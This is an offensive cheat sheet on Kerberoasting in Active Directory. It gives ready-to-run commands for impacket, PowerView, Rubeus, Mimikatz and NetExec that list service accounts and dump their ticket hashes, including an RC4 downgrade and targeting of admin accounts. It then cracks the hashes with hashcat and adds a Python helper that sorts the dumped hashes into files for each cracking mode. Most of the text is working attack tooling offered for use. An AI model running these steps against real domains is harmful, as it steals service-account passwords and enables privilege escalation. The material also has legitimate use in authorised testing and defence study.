Kerberoasting
Kerberoasting is a credential-access technique that abuses how Kerberos issues service tickets in order to recover service account passwords. It targets accounts with a Service Principal Name (SPN), the identifier in Active Directory that binds a service to the account it runs under. Any authenticated domain user can request a service ticket (TGS) for any SPN; the ticket's encrypted part is protected with a key derived from the service account's password, so the attacker extracts that ciphertext and cracks it offline. A successful crack yields the plaintext password of the service account, which is often highly privileged, which is why the technique is commonly used for privilege escalation and lateral movement.
Linux
# Note: 'rezydev' is the user whose credentials/NTLM hash I have.
# List accounts with an SPN set (the kerberoastable accounts)
# (if you only have the NTLM hash, drop ':password' and add '-hashes LMHASH:NTHASH')
python3 /path/to/GetUserSPNs.py -dc-ip 10.10.10.10 REZYDEV.LOCAL/rezydev:password
# Request TGS tickets for all SPN accounts and print them in crackable format
python3 /path/to/GetUserSPNs.py -dc-ip 10.10.10.10 REZYDEV.LOCAL/rezydev:password -request
# Request a TGS ticket for the single user 'jethalal'
python3 /path/to/GetUserSPNs.py -dc-ip 10.10.10.10 REZYDEV.LOCAL/rezydev:password -request-user jethalal
# Note: add '-outputfile filename' to save the TGS hashes to a file for cracking
Windows
- PowerView
- Rubeus
- Half-Manual
PowerView
Import-Module .\PowerView.ps1 # Import PowerView
Get-DomainUser * -spn | select samaccountname # List accounts with an SPN set
# Get a TGS ticket in hashcat-crackable format for user 'http_svc'
Get-DomainUser -Identity http_svc | Get-DomainSPNTicket -Format Hashcat
# Same as above, but write only the hash string (no wrapping) to a file
(Get-DomainUser -Identity http_svc | Get-DomainSPNTicket -Format Hashcat).Hash -join "" | Out-File -Encoding ascii C:\Windows\Temp\hash.txt
# Export the TGS hashes of all users with an SPN set to a .csv file for cracking
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs.csv -NoTypeInformation
Rubeus
# Roast all kerberoastable users; /nowrap prints each hash on one line for easy copying
.\Rubeus.exe kerberoast /nowrap
# Show statistics (encryption types, pwdLastSet years) on kerberoastable accounts without requesting tickets
.\Rubeus.exe kerberoast /stats
# Roast only the user 'rezydev'
.\Rubeus.exe kerberoast /user:rezydev /nowrap
# Roast only high-privilege accounts (adminCount=1)
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
## Note: the /tgtdeleg flag uses the tgtdeleg trick to request RC4 (etype 23) tickets even for
## accounts with AES enabled (AES128 = etype 17, AES256 = etype 18), which crack much faster,
## but this downgrade does not work against Windows Server 2019 or newer domain controllers.
Half-Manual
# List SPN accounts
setspn.exe -Q */*
# Request a TGS ticket for a specific SPN via .NET (the ticket is cached in the current logon session)
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLserv/BLRMS200833152.rezydev.local:1433"
# The ticket now sits in memory; use Mimikatz to export the cached TGS tickets
# from the session.
mimikatz> base64 /out:true # Print exported tickets as Base64 instead of writing .kirbi files
mimikatz> kerberos::list /export # List and export the cached Kerberos tickets
echo "<base64-ticket>" | tr -d \\n > b64tgsfile # Strip the newlines from the pasted Base64
cat b64tgsfile | base64 -d > file.kirbi # Decode back to a .kirbi file
# Convert the .kirbi with 'kirbi2john.py' (from John the Ripper's run/ directory) and crack it offline.
Quick Win using NetExec
# Valid domain credentials are required :D
nxc ldap dc01.rezydev.local -u 'rezydev' -p 'Password123@' --kerberoasting hashesOut.txt
Crack the Hash
# -m 13100 is for RC4 (etype 23) TGS-REP hashes; AES128 (etype 17) needs -m 19600 and AES256 (etype 18) needs -m 19700
hashcat -m 13100 hashesOut.txt /usr/share/wordlists/rockyou.txt
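The hashcat line above only covers RC4 tickets, and Rubeus output without /nowrap wraps long hashes across several lines, so a mixed dump is easy to feed to the wrong mode. The script below is an added example, not code from the original page or from impacket, Rubeus or hashcat: it pulls $krb5tgs$ hashes out of pasted tool output, re-joins wrapped lines, groups them by encryption type and writes one file per hashcat mode together with the command to run. The embedded sample output is constructed (the hex values are placeholders, not real ticket data) and the function names are my own.

```python
"""Sort Kerberoast output into per-etype files and pick the matching hashcat mode."""
import re
from collections import defaultdict
from pathlib import Path

# hashcat mode per Kerberos encryption type (etype) found in the $krb5tgs$<etype>$ prefix
HASHCAT_MODE = {
    23: 13100,  # RC4-HMAC
    17: 19600,  # AES128-CTS-HMAC-SHA1-96
    18: 19700,  # AES256-CTS-HMAC-SHA1-96
}

# Matches both layouts emitted by Rubeus/impacket:
#   RC4:  $krb5tgs$23$*user$REALM$spn*$checksum$edata
#   AES:  $krb5tgs$18$user$REALM$*spn*$checksum$edata   (the *spn* part may be absent)
TGS_RE = re.compile(r"^\$krb5tgs\$(?P<etype>\d+)\$\*?(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample: a Rubeus-style dump (one wrapped RC4 hash) plus two AES hashes.
# The hex blobs are placeholders, not real ticket material.
SAMPLE_OUTPUT = """\
[*] SamAccountName         : http_svc
[*] Hash                   : $krb5tgs$23$*http_svc$REZYDEV.LOCAL$http/web01.rezydev.local*$0a1b2c3d4e5f60718293a4b5c6d7e8f9$00112233445566778899aabbccddeeff
                             ffeeddccbbaa99887766554433221100
[*] SamAccountName         : sql_svc
[*] Hash                   : $krb5tgs$18$sql_svc$REZYDEV.LOCAL$*MSSQLSvc/db01.rezydev.local:1433*$0011223344556677889900aabbccddee$ffeeddccbbaa998877665544332211000123456789abcdef
[*] SamAccountName         : not_a_hash_line
$krb5tgs$17$aes_svc$REZYDEV.LOCAL$aabbccddeeff00112233445566778899$99887766554433221100ffeeddccbbaa
"""


def extract_hashes(text):
    """Pull $krb5tgs$ hashes out of tool output, re-joining wrapped continuation lines."""
    hashes = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        idx = line.find("$krb5tgs$")
        if idx != -1:
            if current:
                hashes.append(current)
            current = line[idx:]
        elif current and line and HEX_RE.match(line):
            # indented hex-only line: continuation of a wrapped hash (Rubeus without /nowrap)
            current += line
        else:
            if current:
                hashes.append(current)
            current = None
    if current:
        hashes.append(current)
    return hashes


def parse_hash(h):
    """Return (etype, user, realm) for a TGS-REP hash, or None if the line isn't one."""
    m = TGS_RE.match(h)
    if not m:
        return None
    return int(m.group("etype")), m.group("user"), m.group("realm")


def split_by_mode(text):
    """Map hashcat mode -> list of hashes; hashes with an unsupported etype are skipped."""
    by_mode = defaultdict(list)
    for h in extract_hashes(text):
        parsed = parse_hash(h)
        if parsed is None:
            continue
        etype, user, realm = parsed
        mode = HASHCAT_MODE.get(etype)
        if mode is None:
            print(f"[!] {user}@{realm}: unsupported etype {etype}, skipping")
            continue
        by_mode[mode].append(h)
    return dict(by_mode)


def write_mode_files(text, outdir, wordlist="/usr/share/wordlists/rockyou.txt"):
    """Write one hash file per hashcat mode and return the hashcat commands to run."""
    outdir = Path(outdir)
    outdir.mkdir(parents=True, exist_ok=True)
    cmds = []
    for mode, hashes in sorted(split_by_mode(text).items()):
        path = outdir / f"tgs_{mode}.txt"
        path.write_text("\n".join(hashes) + "\n")
        cmds.append(f"hashcat -m {mode} {path} {wordlist}")
    return cmds


if __name__ == "__main__":
    for cmd in write_mode_files(SAMPLE_OUTPUT, "tgs_out"):
        print(cmd)
```

Paste the raw output of GetUserSPNs.py, Rubeus or nxc into a file and pass its contents to write_mode_files; each resulting tgs_<mode>.txt is already in the right format for the mode in its name, so the RC4/AES mix never ends up in a single 13100 run.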